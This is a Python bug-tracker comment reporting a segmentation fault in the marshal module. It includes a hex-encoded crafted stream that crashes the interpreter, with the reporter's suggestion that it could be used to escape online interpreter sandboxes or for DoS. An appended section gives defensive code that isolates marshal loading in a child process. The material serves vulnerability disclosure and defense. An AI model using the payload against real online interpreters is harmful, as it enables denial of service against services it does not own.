[issue41208] An exploitable segmentation fault in marshal module
Iman Sharafodin
report at bugs.python.org
Sun Jul 12 10:45:23 EDT 2020
Iman Sharafodin <iman.sharafodin at gmail.com> added the comment:
There are many online Python interpreters; we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as they fully trust that Python doesn't generate segfaults.
For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though they have protection mechanisms for file access and many other things.
-----------
https://www.programiz.com/python-programming/online-compiler/
-----------
import io
import marshal

# Crafted marshal stream from the report, decoded and fed to marshal.load().
hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
data = marshal.load(f)  # the interpreter crashes here, before anything below runs
print(data)
print('We have segfault but we cannot see!')
-------------------
----------
_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue41208>
_______________________________________
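A defensive counterpart to the report above, added here and not part of the original thread: untrusted marshal input is handed to a short-lived child interpreter, so a crash inside the loader surfaces as a non-zero exit code instead of taking down the host process, and only plain data (never a code object) is passed back. The JSON re-encoding, the `plain()` allow-list and the sample blobs are assumptions of this example, not anything from the report.

```python
import json
import marshal
import subprocess
import sys

# Child program: deserialize stdin with marshal, then re-emit the result as
# JSON so that only plain data (never a code object) reaches the parent.
_CHILD = r"""
import json, marshal, sys

def plain(o):
    # Allow-list of value types that may be returned to the parent.
    if o is None or isinstance(o, (bool, int, float, str)):
        return o
    if isinstance(o, bytes):
        return {"__bytes__": o.hex()}
    if isinstance(o, (list, tuple, set, frozenset)):
        return [plain(x) for x in o]
    if isinstance(o, dict):
        return {str(k): plain(v) for k, v in o.items()}
    raise TypeError("refusing to pass on %s" % type(o).__name__)

try:
    value = plain(marshal.loads(sys.stdin.buffer.read()))
    sys.stdout.write(json.dumps({"ok": True, "value": value}))
except Exception as exc:  # malformed stream or disallowed type
    sys.stdout.write(json.dumps({"ok": False, "error": repr(exc)}))
"""

def isolated_marshal_load(blob, timeout=5.0):
    """Run marshal.loads on untrusted bytes in a throwaway interpreter.
    A segfault in the loader kills only the child and is reported here as a
    negative return code (the signal number) instead of crashing this process.
    """
    try:
        proc = subprocess.run([sys.executable, "-I", "-c", _CHILD],
                              input=blob, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return {"ok": False, "error": "child timed out"}
    if proc.returncode != 0:
        return {"ok": False, "error": "child exited with %d" % proc.returncode}
    return json.loads(proc.stdout.decode())

# Constructed sample inputs (not the report's payload): a benign structure,
# a truncated stream, and a serialized code object the filter must reject.
SAMPLE_GOOD = marshal.dumps({"a": (1, 2), "b": b"\x00"})
SAMPLE_TRUNCATED = marshal.dumps((1, 2, 3))[:-1]
SAMPLE_CODE = marshal.dumps(compile("1 + 1", "<constructed>", "eval"))
```

Note that this only contains the crash; the tuple limits, `-I` and timeout do not make marshal safe for untrusted data, they keep a bad input from becoming a denial of service for the host.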